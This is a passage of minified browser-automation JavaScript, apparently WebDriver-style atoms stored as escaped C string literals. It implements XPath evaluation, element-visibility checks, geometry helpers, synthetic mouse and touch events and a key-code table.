",a,b,c)});J(\"<=\",4,2,function(a,b,c){return I(function(a,b){return a<"\
"=b},a,b,c)});J(\">=\",4,2,function(a,b,c){return I(function(a,b){return"\
" a>=b},a,b,c)});J(\"=\",3,2,function(a,b,c){return I(function(a,b){retu"\
"rn a==b},a,b,c,!0)});\nJ(\"!=\",3,2,function(a,b,c){return I(function(a"\
",b){return a!=b},a,b,c,!0)});J(\"and\",2,2,function(a,b,c){return H(a,c"\
")&&H(b,c)});J(\"or\",1,2,function(a,b,c){return H(a,c)||H(b,c)});functi"\
"on Wa(a,b,c,d,e,f,h,q,n){this.A=a;this.O=b;this.ba=c;this.aa=d;this.$=e"\
";this.o=f;this.Z=h;this.Y=l(q)?q:h;this.da=!!n}Wa.prototype.toString=aa"\
"(\"A\");var Xa={};function K(a,b,c,d,e,f,h,q){if(a in Xa)throw Error(\""\
"Function already created: \"+a+\".\");Xa[a]=new Wa(a,b,c,d,!1,e,f,h,q)}"\
"K(\"boolean\",2,!1,!1,function(a,b){return H(b,a)},1);K(\"ceiling\",1,!"\
"1,!1,function(a,b){return Math.ceil(D(b,a))},1);\nK(\"concat\",3,!1,!1,"\
"function(a,b){var c=la(arguments,1);return ia(c,function(b,c){return b+"\
"E(c,a)})},2,null);K(\"contains\",2,!1,!1,function(a,b,c){b=E(b,a);a=E(c"\
",a);return-1!=b.indexOf(a)},2);K(\"count\",1,!1,!1,function(a,b){return"\
" b.evaluate(a).p},1,1,!0);K(\"false\",2,!1,!1,ba(!1),0);K(\"floor\",1,!"\
"1,!1,function(a,b){return Math.floor(D(b,a))},1);\nK(\"id\",4,!1,!1,fun"\
"ction(a,b){var c=a.m,d=9==c.nodeType?c:c.ownerDocument,c=E(b,a).split(/"\
"\\s+/),e=[];s(c,function(a){(a=d.getElementById(a))&&!ka(e,a)&&e.push(a"\
")});e.sort(Ha);var f=new B;s(e,function(a){f.add(a)});return f},1);K(\""\
"lang\",2,!1,!1,ba(!1),1);K(\"last\",1,!0,!1,function(a){if(1!=arguments"\
".length)throw Error(\"Function last expects ()\");return a.h},0);K(\"lo"\
"cal-name\",3,!1,!0,function(a,b){var c=b?Sa(b.evaluate(a)):a.m;return c"\
"?c.nodeName.toLowerCase():\"\"},0,1,!0);\nK(\"name\",3,!1,!0,function(a"\
",b){var c=b?Sa(b.evaluate(a)):a.m;return c?c.nodeName.toLowerCase():\""\
"\"},0,1,!0);K(\"namespace-uri\",3,!0,!1,ba(\"\"),0,1,!0);K(\"normalize-"\
"space\",3,!1,!0,function(a,b){return(b?E(b,a):y(a.m)).replace(/[\\s\\xa"\
"0]+/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);K(\"not\",2,!1,!1,funct"\
"ion(a,b){return!H(b,a)},1);K(\"number\",1,!1,!0,function(a,b){return b?"\
"D(b,a):+y(a.m)},0,1);K(\"position\",1,!0,!1,function(a){return a.ea},0)"\
";K(\"round\",1,!1,!1,function(a,b){return Math.round(D(b,a))},1);\nK(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=E(b,a);a=E(c,a);return 0==b.las"\
"tIndexOf(a,0)},2);K(\"string\",3,!1,!0,function(a,b){return b?E(b,a):y("\
"a.m)},0,1);K(\"string-length\",1,!1,!0,function(a,b){return(b?E(b,a):y("\
"a.m)).length},0,1);\nK(\"substring\",3,!1,!1,function(a,b,c,d){c=D(c,a)"\
";if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?D(d,a):Infinity;"\
"if(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max("\
"c,0);a=E(b,a);if(Infinity==d)return a.substring(e);b=Math.round(d);retu"\
"rn a.substring(e,c+b)},2,3);K(\"substring-after\",3,!1,!1,function(a,b,"\
"c){b=E(b,a);a=E(c,a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.le"\
"ngth)},2);\nK(\"substring-before\",3,!1,!1,function(a,b,c){b=E(b,a);a=E"\
"(c,a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);K(\"sum\",1,"\
"!1,!1,function(a,b){var c;c=b.evaluate(a);c=new C(c,!1);for(var d=0,e=c"\
".next();e;e=c.next())d+=+y(e);return d},1,1,!0);K(\"translate\",3,!1,!1"\
",function(a,b,c,d){b=E(b,a);c=E(c,a);var e=E(d,a);a=[];for(d=0;d<c.leng"\
"th;d++){var f=c.charAt(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b"\
".length;d++)f=b.charAt(d),c+=f in a?a[f]:f;return c},3);K(\"true\",2,!1"\
",!1,ba(!0),0);function Ya(a,b,c,d){this.A=a;this.W=b;this.K=c;this.ia=d"\
"}Ya.prototype.toString=aa(\"A\");var Za={};function L(a,b,c,d){if(a in "\
"Za)throw Error(\"Axis already created: \"+a);Za[a]=new Ya(a,b,c,!!d)}L("\
"\"ancestor\",function(a,b){for(var c=new B,d=b;d=d.parentNode;)a.matche"\
"s(d)&&c.unshift(d);return c},!0);L(\"ancestor-or-self\",function(a,b){v"\
"ar c=new B,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);retu"\
"rn c},!0);\nL(\"attribute\",function(a,b){var c=new B,d=a.getName(),e=b"\
".attributes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e"\
".getNamedItem(d))&&c.add(f);return c},!1);L(\"child\",function(a,b,c,d,"\
"e){return Pa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new B)},!1,!0);L("\
"\"descendant\",Na,!1,!0);L(\"descendant-or-self\",function(a,b,c,d){var"\
" e=new B;z(b,c,d)&&a.matches(b)&&e.add(b);return Na(a,b,c,d,e)},!1,!0);"\
"\nL(\"following\",function(a,b,c,d){var e=new B;do for(var f=b;f=f.next"\
"Sibling;)z(f,c,d)&&a.matches(f)&&e.add(f),e=Na(a,f,c,d,e);while(b=b.par"\
"entNode);return e},!1,!0);L(\"following-sibling\",function(a,b){for(var"\
" c=new B,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);L(\""\
"namespace\",function(){return new B},!1);L(\"parent\",function(a,b){var"\
" c=new B;if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.owne"\
"rElement),c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nL"\
"(\"preceding\",function(a,b,c,d){var e=new B,f=[];do f.unshift(b);while"\
"(b=b.parentNode);for(var h=1,q=f.length;h<q;h++){var n=[];for(b=f[h];b="\
"b.previousSibling;)n.unshift(b);for(var A=0,wa=n.length;A<wa;A++)b=n[A]"\
",z(b,c,d)&&a.matches(b)&&e.add(b),e=Na(a,b,c,d,e)}return e},!0,!0);L(\""\
"preceding-sibling\",function(a,b){for(var c=new B,d=b;d=d.previousSibli"\
"ng;)a.matches(d)&&c.unshift(d);return c},!0);L(\"self\",function(a,b){v"\
"ar c=new B;a.matches(b)&&c.add(b);return c},!1);var M={};M.L=function()"\
"{var a={ja:\"http://www.w3.org/2000/svg\"};return function(b){return a["\
"b]||null}}();M.o=function(a,b,c){var d=w(a);try{var e=d.createNSResolve"\
"r?d.createNSResolver(d.documentElement):M.L;return d.evaluate(b,a,e,c,n"\
"ull)}catch(f){throw new t(32,\"Unable to locate an element with the xpa"\
"th expression \"+b+\" because of the following error:\\n\"+f);}};\nM.D="\
"function(a,b){if(!a||1!=a.nodeType)throw new t(32,'The result of the xp"\
"ath expression \"'+b+'\" is: '+a+\". It should be an element.\");};M.T="\
"function(a,b){var c=function(){var c=M.o(b,a,9);return c?c.singleNodeVa"\
"lue||null:b.selectSingleNode?(c=w(b),c.setProperty&&c.setProperty(\"Sel"\
"ectionLanguage\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||M."\
"D(c,a);return c};\nM.X=function(a,b){var c=function(){var c=M.o(b,a,7);"\
"if(c){for(var e=c.snapshotLength,f=[],h=0;h<e;++h)f.push(c.snapshotItem"\
"(h));return f}return b.selectNodes?(c=w(b),c.setProperty&&c.setProperty"\
"(\"SelectionLanguage\",\"XPath\"),b.selectNodes(a)):[]}();s(c,function("\
"b){M.D(b,a)});return c};var $a,ab=/Chrome\\/([0-9.]+)/.exec(k.navigator"\
"?k.navigator.userAgent:null);$a=ab?ab[1]:\"\";function bb(a,b,c,d){this"\
".top=a;this.right=b;this.bottom=c;this.left=d}g=bb.prototype;g.toString"\
"=function(){return\"(\"+this.top+\"t, \"+this.right+\"r, \"+this.bottom"\
"+\"b, \"+this.left+\"l)\"};g.contains=function(a){return this&&a?a inst"\
"anceof bb?a.left>=this.left&&a.right<=this.right&&a.top>=this.top&&a.bo"\
"ttom<=this.bottom:a.x>=this.left&&a.x<=this.right&&a.y>=this.top&&a.y<="\
"this.bottom:!1};\ng.ceil=function(){this.top=Math.ceil(this.top);this.r"\
"ight=Math.ceil(this.right);this.bottom=Math.ceil(this.bottom);this.left"\
"=Math.ceil(this.left);return this};g.floor=function(){this.top=Math.flo"\
"or(this.top);this.right=Math.floor(this.right);this.bottom=Math.floor(t"\
"his.bottom);this.left=Math.floor(this.left);return this};g.round=functi"\
"on(){this.top=Math.round(this.top);this.right=Math.round(this.right);th"\
"is.bottom=Math.round(this.bottom);this.left=Math.round(this.left);retur"\
"n this};\ng.scale=function(a,b){var c=da(b)?b:a;this.left*=a;this.right"\
"*=a;this.top*=c;this.bottom*=c;return this};function N(a,b,c,d){this.le"\
"ft=a;this.top=b;this.width=c;this.height=d}g=N.prototype;g.toString=fun"\
"ction(){return\"(\"+this.left+\", \"+this.top+\" - \"+this.width+\"w x "\
"\"+this.height+\"h)\"};g.contains=function(a){return a instanceof N?thi"\
"s.left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&"\
"this.top+this.height>=a.top+a.height:a.x>=this.left&&a.x<=this.left+thi"\
"s.width&&a.y>=this.top&&a.y<=this.top+this.height};\ng.ceil=function(){"\
"this.left=Math.ceil(this.left);this.top=Math.ceil(this.top);this.width="\
"Math.ceil(this.width);this.height=Math.ceil(this.height);return this};g"\
".floor=function(){this.left=Math.floor(this.left);this.top=Math.floor(t"\
"his.top);this.width=Math.floor(this.width);this.height=Math.floor(this."\
"height);return this};g.round=function(){this.left=Math.round(this.left)"\
";this.top=Math.round(this.top);this.width=Math.round(this.width);this.h"\
"eight=Math.round(this.height);return this};\ng.scale=function(a,b){var "\
"c=da(b)?b:a;this.left*=a;this.width*=a;this.top*=c;this.height*=c;retur"\
"n this};function O(a,b){var c=w(a);return c.defaultView&&c.defaultView."\
"getComputedStyle&&(c=c.defaultView.getComputedStyle(a,null))?c[b]||c.ge"\
"tPropertyValue(b)||\"\":\"\"}function P(a,b){return O(a,b)||(a.currentS"\
"tyle?a.currentStyle[b]:null)||a.style&&a.style[b]}function cb(a){var b;"\
"try{b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bo"\
"ttom:0}}return b}\nfunction db(a){var b=w(a),c=P(a,\"position\"),d=\"fi"\
"xed\"==c||\"absolute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if("\
"c=P(a,\"position\"),d=d&&\"static\"==c&&a!=b.documentElement&&a!=b.body"\
",!d&&(a.scrollWidth>a.clientWidth||a.scrollHeight>a.clientHeight||\"fix"\
"ed\"==c||\"absolute\"==c||\"relative\"==c))return a;return null}\nfunct"\
"ion eb(a){var b=w(a),c=P(a,\"position\"),d=new v(0,0),e=(b?w(b):documen"\
"t).documentElement;if(a==e)return d;if(a.getBoundingClientRect)a=cb(a),"\
"b=Ma(b?new x(w(b)):Ca||(Ca=new x)),d.x=a.left+b.x,d.y=a.top+b.y;else if"\
"(b.getBoxObjectFor)a=b.getBoxObjectFor(a),b=b.getBoxObjectFor(e),d.x=a."\
"screenX-b.screenX,d.y=a.screenY-b.screenY;else{var f=a;do{d.x+=f.offset"\
"Left;d.y+=f.offsetTop;f!=a&&(d.x+=f.clientLeft||0,d.y+=f.clientTop||0);"\
"if(\"fixed\"==P(f,\"position\")){d.x+=b.body.scrollLeft;d.y+=b.body.scr"\
"ollTop;\nbreak}f=f.offsetParent}while(f&&f!=a);\"absolute\"==c&&(d.y-=b"\
".body.offsetTop);for(f=a;(f=db(f))&&f!=b.body&&f!=e;)d.x-=f.scrollLeft,"\
"d.y-=f.scrollTop}return d}function fb(a){if(1==a.nodeType){if(a.getBoun"\
"dingClientRect)a=cb(a),a=new v(a.left,a.top);else{var b=Ma(a?new x(w(a)"\
"):Ca||(Ca=new x));a=eb(a);a=new v(a.x-b.x,a.y-b.y)}return a}var b=p(a.H"\
"),c=a;a.targetTouches?c=a.targetTouches[0]:b&&a.H().targetTouches&&(c=a"\
".H().targetTouches[0]);return new v(c.clientX,c.clientY)}\nfunction gb("\
"a){var b=a.offsetWidth,c=a.offsetHeight;return l(b)&&(b||c)||!a.getBoun"\
"dingClientRect?new Da(b,c):(a=cb(a),new Da(a.right-a.left,a.bottom-a.to"\
"p))};function Q(a,b){return!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCa"\
"se()==b)}function hb(a){return ib(a,!0)&&jb(a)&&\"none\"!=R(a,\"pointer"\
"-events\")}function kb(a){return Q(a,\"OPTION\")?!0:Q(a,\"INPUT\")?(a=a"\
".type.toLowerCase(),\"checkbox\"==a||\"radio\"==a):!1}function lb(a){if"\
"(!kb(a))throw new t(15,\"Element is not selectable\");var b=\"selected"\
"\",c=a.type&&a.type.toLowerCase();if(\"checkbox\"==c||\"radio\"==c)b=\""\
"checked\";return!!a[b]}var mb=\"BUTTON INPUT OPTGROUP OPTION SELECT TEX"\
"TAREA\".split(\" \");\nfunction jb(a){var b=a.tagName.toUpperCase();ret"\
"urn ka(mb,b)?a.disabled?!1:a.parentNode&&1==a.parentNode.nodeType&&\"OP"\
"TGROUP\"==b||\"OPTION\"==b?jb(a.parentNode):!Ka(a,function(a){var b=a.p"\
"arentNode;if(b&&Q(b,\"FIELDSET\")&&b.disabled){if(!Q(a,\"LEGEND\"))retu"\
"rn!0;for(;a=void 0!=a.previousElementSibling?a.previousElementSibling:F"\
"a(a.previousSibling);)if(Q(a,\"LEGEND\"))return!0}return!1},!0):!0}\nfu"\
"nction S(a){for(a=a.parentNode;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.n"\
"odeType;)a=a.parentNode;return Q(a)?a:null}\nfunction R(a,b){var c=fa(b"\
");if(\"float\"==c||\"cssFloat\"==c||\"styleFloat\"==c)c=\"cssFloat\";c="\
"O(a,c)||nb(a,c);if(null===c)c=null;else if(ka(na,b)&&(qa.test(\"#\"==c."\
"charAt(0)?c:\"#\"+c)||ua(c).length||ma&&ma[c.toLowerCase()]||sa(c).leng"\
"th)){var d=sa(c);if(!d.length){a:if(d=ua(c),!d.length){d=(d=ma[c.toLowe"\
"rCase()])?d:\"#\"==c.charAt(0)?c:\"#\"+c;if(qa.test(d)&&(d=pa(d),d=pa(d"\
"),d=[parseInt(d.substr(1,2),16),parseInt(d.substr(3,2),16),parseInt(d.s"\
"ubstr(5,2),16)],d.length))break a;d=[]}3==d.length&&d.push(1)}c=4!=\nd."\
"length?c:\"rgba(\"+d.join(\", \")+\")\"}return c}function nb(a,b){var c"\
"=a.currentStyle||a.style,d=c[b];!l(d)&&p(c.getPropertyValue)&&(d=c.getP"\
"ropertyValue(b));return\"inherit\"!=d?l(d)?d:null:(c=S(a))?nb(c,b):null"\
"}\nfunction ib(a,b){function c(a){if(\"none\"==R(a,\"display\"))return!"\
"1;a=S(a);return!a||c(a)}function d(a){var b=T(a);return 0<b.height&&0<b"\
".width?!0:Q(a,\"PATH\")&&(0<b.height||0<b.width)?(a=R(a,\"stroke-width"\
"\"),!!a&&0<parseInt(a,10)):\"hidden\"!=R(a,\"overflow\")&&ja(a.childNod"\
"es,function(a){return a.nodeType==Ea||Q(a)&&d(a)})}function e(a){var b="\
"R(a,\"-o-transform\")||R(a,\"-webkit-transform\")||R(a,\"-ms-transform"\
"\")||R(a,\"-moz-transform\")||R(a,\"transform\");if(b&&\"none\"!==b)ret"\
"urn b=fb(a),a=T(a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=S(a);retur"\
"n!a||e(a)}if(!Q(a))throw Error(\"Argument to isShown must be of type El"\
"ement\");if(Q(a,\"OPTION\")||Q(a,\"OPTGROUP\")){var f=Ka(a,function(a){"\
"return Q(a,\"SELECT\")});return!!f&&ib(f,!0)}return(f=ob(a))?!!f.I&&0<f"\
".rect.width&&0<f.rect.height&&ib(f.I,b):Q(a,\"INPUT\")&&\"hidden\"==a.t"\
"ype.toLowerCase()||Q(a,\"NOSCRIPT\")||\"hidden\"==R(a,\"visibility\")||"\
"!c(a)||!b&&0==pb(a)||!d(a)||qb(a)==rb?!1:e(a)}var rb=\"hidden\";\nfunct"\
"ion qb(a){function b(a){var b=a;if(\"visible\"==q)if(a==f)b=h;else if(a"\
"==h)return{x:\"visible\",y:\"visible\"};b={x:R(b,\"overflow-x\"),y:R(b,"\
"\"overflow-y\")};a==f&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"h"\
"idden\"==b.y?\"hidden\":\"auto\");return b}function c(a){var b=R(a,\"po"\
"sition\");if(\"fixed\"==b)return f;for(a=S(a);a&&a!=f&&(0==R(a,\"displa"\
"y\").lastIndexOf(\"inline\",0)||\"absolute\"==b&&\"static\"==R(a,\"posi"\
"tion\"));)a=S(a);return a}var d=T(a),e=w(a),f=e.documentElement,h=e.bod"\
"y,q=R(f,\"overflow\");for(a=c(a);a;a=\nc(a)){var n=T(a),e=b(a),A=d.left"\
">=n.left+n.width,n=d.top>=n.top+n.height;if(A&&\"hidden\"==e.x||n&&\"hi"\
"dden\"==e.y)return rb;if(A&&\"visible\"!=e.x||n&&\"visible\"!=e.y)retur"\
"n qb(a)==rb?rb:\"scroll\"}return\"none\"}\nfunction T(a){var b=ob(a);if"\
"(b)return b.rect;if(p(a.getBBox))try{var c=a.getBBox();return new N(c.x"\
",c.y,c.width,c.height)}catch(d){throw d;}else{if(Q(a,\"HTML\"))return a"\
"=((w(a)?w(a).parentWindow||w(a).defaultView:window)||window).document,a"\
"=\"CSS1Compat\"==a.compatMode?a.documentElement:a.body,a=new Da(a.clien"\
"tWidth,a.clientHeight),new N(0,0,a.width,a.height);var b=fb(a),c=a.offs"\
"etWidth,e=a.offsetHeight;c||(e||!a.getBoundingClientRect)||(a=a.getBoun"\
"dingClientRect(),c=a.right-a.left,e=a.bottom-a.top);\nreturn new N(b.x,"\
"b.y,c,e)}}function ob(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))retur"\
"n null;var c=b?a:Q(a.parentNode,\"MAP\")?a.parentNode:null,d=null,e=nul"\
"l;if(c&&c.name&&(d=M.T('/descendant::*[@usemap = \"#'+c.name+'\"]',w(c)"\
"))&&(e=T(d),!b&&\"default\"!=a.shape.toLowerCase())){var f=sb(a);a=Math"\
".min(Math.max(f.left,0),e.width);b=Math.min(Math.max(f.top,0),e.height)"\
";c=Math.min(f.width,e.width-a);f=Math.min(f.height,e.height-b);e=new N("\
"a+e.left,b+e.top,c,f)}return{I:d,rect:e||new N(0,0,0,0)}}\nfunction sb("\
"a){var b=a.shape.toLowerCase();a=a.coords.split(\",\");if(\"rect\"==b&&"\
"4==a.length){var b=a[0],c=a[1];return new N(b,c,a[2]-b,a[3]-c)}if(\"cir"\
"cle\"==b&&3==a.length)return b=a[2],new N(a[0]-b,a[1]-b,2*b,2*b);if(\"p"\
"oly\"==b&&2<a.length){for(var b=a[0],c=a[1],d=b,e=c,f=2;f+1<a.length;f+"\
"=2)b=Math.min(b,a[f]),d=Math.max(d,a[f]),c=Math.min(c,a[f+1]),e=Math.ma"\
"x(e,a[f+1]);return new N(b,c,d-b,e-c)}return new N(0,0,0,0)}\nfunction "\
"pb(a){var b=1,c=R(a,\"opacity\");c&&(b=Number(c));(a=S(a))&&(b*=pb(a));"\
"return b};function tb(a,b){this.c=ea.document.documentElement;this.f=nu"\
"ll;var c=La(w(this.c));c&&ub(this,c);this.i=a||new vb;this.G=b||new wb}"\
"function ub(a,b){a.c=b;a.f=Q(b,\"OPTION\")?Ka(b,function(a){return Q(a,"\
"\"SELECT\")}):null}\ntb.prototype.k=function(a,b,c,d,e,f,h){if(!f&&!hb("\
"this.c))return!1;if(d&&xb!=a&&yb!=a)throw new t(12,\"Event type does no"\
"t allow related target: \"+a);b={clientX:b.x,clientY:b.y,button:c,altKe"\
"y:this.i.d(4),ctrlKey:this.i.d(2),shiftKey:this.i.d(1),metaKey:this.i.d"\
"(8),wheelDelta:e||0,relatedTarget:d||null};h=h||1;c=this.c;if(a!=zb&&a!"\
"=Ab&&h in Bb)c=Bb[h];else if(this.f)a:switch(a){case zb:case Cb:c=this."\
"f.multiple?this.c:this.f;break a;default:c=this.f.multiple?this.c:null}"\
"return c?this.G.k(c,a,b):!0};\ntb.prototype.v=function(a,b,c,d,e){funct"\
"ion f(b,c){var d={identifier:b,screenX:c.x,screenY:c.y,clientX:c.x,clie"\
"ntY:c.y,pageX:c.x,pageY:c.y};h.changedTouches.push(d);if(a==Db||a==Eb)h"\
".touches.push(d),h.targetTouches.push(d)}var h={touches:[],targetTouche"\
"s:[],changedTouches:[],altKey:this.i.d(4),ctrlKey:this.i.d(2),shiftKey:"\
"this.i.d(1),metaKey:this.i.d(8),relatedTarget:null,scale:0,rotation:0};"\
"f(b,c);l(d)&&f(d,e);return this.G.v(this.c,a,h)};function vb(){this.S=0"\
"}\nvb.prototype.d=function(a){return 0!=(this.S&a)};var Bb={};function "\
"wb(){}wb.prototype.k=function(a,b,c){return Fb(a,b,c)};wb.prototype.v=f"\
"unction(a,b,c){return Fb(a,b,c)};function U(a,b,c){this.n=a;this.r=b;th"\
"is.s=c}U.prototype.create=function(a){a=w(a).createEvent(\"HTMLEvents\""\
");a.initEvent(this.n,this.r,this.s);return a};U.prototype.toString=aa("\
"\"n\");function V(a,b,c){U.call(this,a,b,c)}r(V,U);\nV.prototype.create"\
"=function(a,b){if(this==Gb)throw new t(9,\"Browser does not support a m"\
"ouse pixel scroll event.\");var c=w(a),d=c?c.parentWindow||c.defaultVie"\
"w:window,c=c.createEvent(\"MouseEvents\");this==Hb&&(c.wheelDelta=b.whe"\
"elDelta);c.initMouseEvent(this.n,this.r,this.s,d,1,0,0,b.clientX,b.clie"\
"ntY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,b.button,b.relatedTarget);r"\
"eturn c};function W(a,b,c){U.call(this,a,b,c)}r(W,U);\nW.prototype.crea"\
"te=function(a,b){function c(b){var c=ha(b,function(b){return{identifier"\
":b.identifier,screenX:b.screenX,screenY:b.screenY,clientX:b.clientX,cli"\
"entY:b.clientY,pageX:b.pageX,pageY:b.pageY,target:a}});c.item=function("\
"a){return c[a]};return c}var d=w(a),e=d?d.parentWindow||d.defaultView:w"\
"indow,f=c(b.changedTouches),h=b.touches==b.changedTouches?f:c(b.touches"\
"),q=b.targetTouches==b.changedTouches?f:c(b.targetTouches),d=d.createEv"\
"ent(\"MouseEvents\");d.initMouseEvent(this.n,this.r,this.s,e,\n1,0,0,b."\
"clientX,b.clientY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,0,b.relatedTa"\
"rget);d.touches=h;d.targetTouches=q;d.changedTouches=f;d.scale=b.scale;"\
"d.rotation=b.rotation;return d};\nvar Ib=new U(\"change\",!0,!1),zb=new"\
" V(\"click\",!0,!0),Ab=new V(\"mousedown\",!0,!0),Jb=new V(\"mousemove"\
"\",!0,!1),yb=new V(\"mouseout\",!0,!0),xb=new V(\"mouseover\",!0,!0),Cb"\
"=new V(\"mouseup\",!0,!0),Hb=new V(\"mousewheel\",!0,!0),Gb=new V(\"Moz"\
"MousePixelScroll\",!0,!0),Kb=new W(\"touchend\",!0,!0),Eb=new W(\"touch"\
"move\",!0,!0),Db=new W(\"touchstart\",!0,!0);function Fb(a,b,c){b=b.cre"\
"ate(a,c);\"isTrusted\"in b||(b.isTrusted=!1);return a.dispatchEvent(b)}"\
";function X(a,b){this.l={};this.e=[];var c=arguments.length;if(1<c){if("\
"c%2)throw Error(\"Uneven number of arguments\");for(var d=0;d<c;d+=2)th"\
"is.set(arguments[d],arguments[d+1])}else if(a){var e;if(a instanceof X)"\
"for(d=Lb(a),Mb(a),e=[],c=0;c<a.e.length;c++)e.push(a.l[a.e[c]]);else{va"\
"r c=[],f=0;for(d in a)c[f++]=d;d=c;c=[];f=0;for(e in a)c[f++]=a[e];e=c}"\
"for(c=0;c<d.length;c++)this.set(d[c],e[c])}}X.prototype.u=0;X.prototype"\
".V=0;function Lb(a){Mb(a);return a.e.concat()}\nfunction Mb(a){if(a.u!="\
"a.e.length){for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototyp"\
"e.hasOwnProperty.call(a.l,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.u!=a.e"\
".length){for(var e={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.has"\
"OwnProperty.call(e,d)||(a.e[c++]=d,e[d]=1),b++;a.e.length=c}}X.prototyp"\
"e.get=function(a,b){return Object.prototype.hasOwnProperty.call(this.l,"\
"a)?this.l[a]:b};\nX.prototype.set=function(a,b){Object.prototype.hasOwn"\
"Property.call(this.l,a)||(this.u++,this.e.push(a),this.V++);this.l[a]=b"\
"};var Ob={};function Y(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||"\
"\"function\"==d)&&(a=a.a);a=new Pb(a,b,c);!b||b in Ob&&!c||(Ob[b]={key:"\
"a,shift:!1},c&&(Ob[c]={key:a,shift:!0}));return a}function Pb(a,b,c){th"\
"is.code=a;this.N=b||null;this.ga=c||this.N}Y(8);Y(9);Y(13);var Qb=Y(16)"\
",Rb=Y(17),Sb=Y(18);Y(19);Y(20);Y(27);Y(32,\" \");Y(33);Y(34);Y(35);Y(36"\
");Y(37);Y(38);Y(39);Y(40);Y(44);Y(45);Y(46);Y(48,\"0\",\")\");Y(49,\"1"\
"\",\"!\");Y(50,\"2\",\"@\");Y(51,\"3\",\"#\");Y(52,\"4\",\"$\");Y(53,\""\
"5\",\"%\");Y(54,\"6\",\"^\");Y(55,\"7\",\"&\");\nY(56,\"8\",\"*\");Y(57"\
",\"9\",\"(\");Y(65,\"a\",\"A\");Y(66,\"b\",\"B\");Y(67,\"c\",\"C\");Y(6"\
"8,\"d\",\"D\");Y(69,\"e\",\"E\");Y(70,\"f\",\"F\");Y(71,\"g\",\"G\");Y("\
"72,\"h\",\"H\");Y(73,\"i\",\"I\");Y(74,\"j\",\"J\");Y(75,\"k\",\"K\");Y"\
"(76,\"l\",\"L\");Y(77,\"m\",\"M\");Y(78,\"n\",\"N\");Y(79,\"o\",\"O\");"\
"Y(80,\"p\",\"P\");Y(81,\"q\",\"Q\");Y(82,\"r\",\"R\");Y(83,\"s\",\"S\")"\
";Y(84,\"t\",\"T\");Y(85,\"u\",\"U\");Y(86,\"v\",\"V\");Y(87,\"w\",\"W\""\
");Y(88,\"x\",\"X\");Y(89,\"y\",\"Y\");Y(90,\"z\",\"Z\");var Tb=Y(za?{b:"\
"91,a:91,opera:219}:ya?{b:224,a:91,opera:17}:{b:0,a:91,opera:null});\nY("\
"za?{b:92,a:92,opera:220}:ya?{b:224,a:93,opera:17}:{b:0,a:92,opera:null}"\
");Y(za?{b:93,a:93,opera:0}:ya?{b:0,a:0,opera:16}:{b:93,a:null,opera:0})"\
";Y({b:96,a:96,opera:48},\"0\");Y({b:97,a:97,opera:49},\"1\");Y({b:98,a:"\
"98,opera:50},\"2\");Y({b:99,a:99,opera:51},\"3\");Y({b:100,a:100,opera:"\
"52},\"4\");Y({b:101,a:101,opera:53},\"5\");Y({b:102,a:102,opera:54},\"6"\
"\");Y({b:103,a:103,opera:55},\"7\");Y({b:104,a:104,opera:56},\"8\");Y({"\
"b:105,a:105,opera:57},\"9\");Y({b:106,a:106,opera:u?56:42},\"*\");\nY({"\
"b:107,a:107,opera:u?61:43},\"+\");Y({b:109,a:109,opera:u?109:45},\"-\")"\
";Y({b:110,a:110,opera:u?190:78},\".\");Y({b:111,a:111,opera:u?191:47},"\
"\"/\");Y(144);Y(112);Y(113);Y(114);Y(115);Y(116);Y(117);Y(118);Y(119);Y"\
"(120);Y(121);Y(122);Y(123);Y({b:107,a:187,opera:61},\"=\",\"+\");Y(108,"\
"\",\");Y({b:109,a:189,opera:109},\"-\",\"_\");Y(188,\",\",\"<\");Y(190,"\
"\".\",\">\");Y(191,\"/\",\"?\");Y(192,\"`\",\"~\");Y(219,\"[\",\"{\");Y"\
"(220,\"\\\\\",\"|\");Y(221,\"]\",\"}\");Y({b:59,a:186,opera:59},\";\","\
"\":\");Y(222,\"'\",'\"');var Z=new X;Z.set(1,Qb);Z.set(2,Rb);\nZ.set(4,"\
"Sb);Z.set(8,Tb);(function(a){var b=new X;s(Lb(a),function(c){b.set(a.ge"\
"t(c).code,c)});return b})(Z);function Ub(){tb.call(this);this.j=new v(0"\
",0);this.t=new v(0,0)}r(Ub,tb);g=Ub.prototype;g.w=!1;g.M=!1;g.q=0;g.C=0"\
";g.U=2;g.move=function(a,b,c){this.d()||ub(this,a);a=T(a);this.j.x=b.x+"\
"a.left;this.j.y=b.y+a.top;l(c)&&(this.t.x=c.x+a.left,this.t.y=c.y+a.top"\
");this.d()&&(this.w=!0,Vb(this,Eb))};g.d=function(){return!!this.q};fun"\
"ction Vb(a,b){if(!a.d())throw new t(13,\"Should never fire event when t"\
"ouchscreen is not pressed.\");var c,d;a.C&&(c=a.C,d=a.t);a.v(b,a.q,a.j,"\
"c,d)};function Wb(a,b){this.x=a;this.y=b}r(Wb,v);Wb.prototype.scale=v.p"\
"rototype.scale;Wb.prototype.add=function(a){this.x+=a.x;this.y+=a.y;ret"\
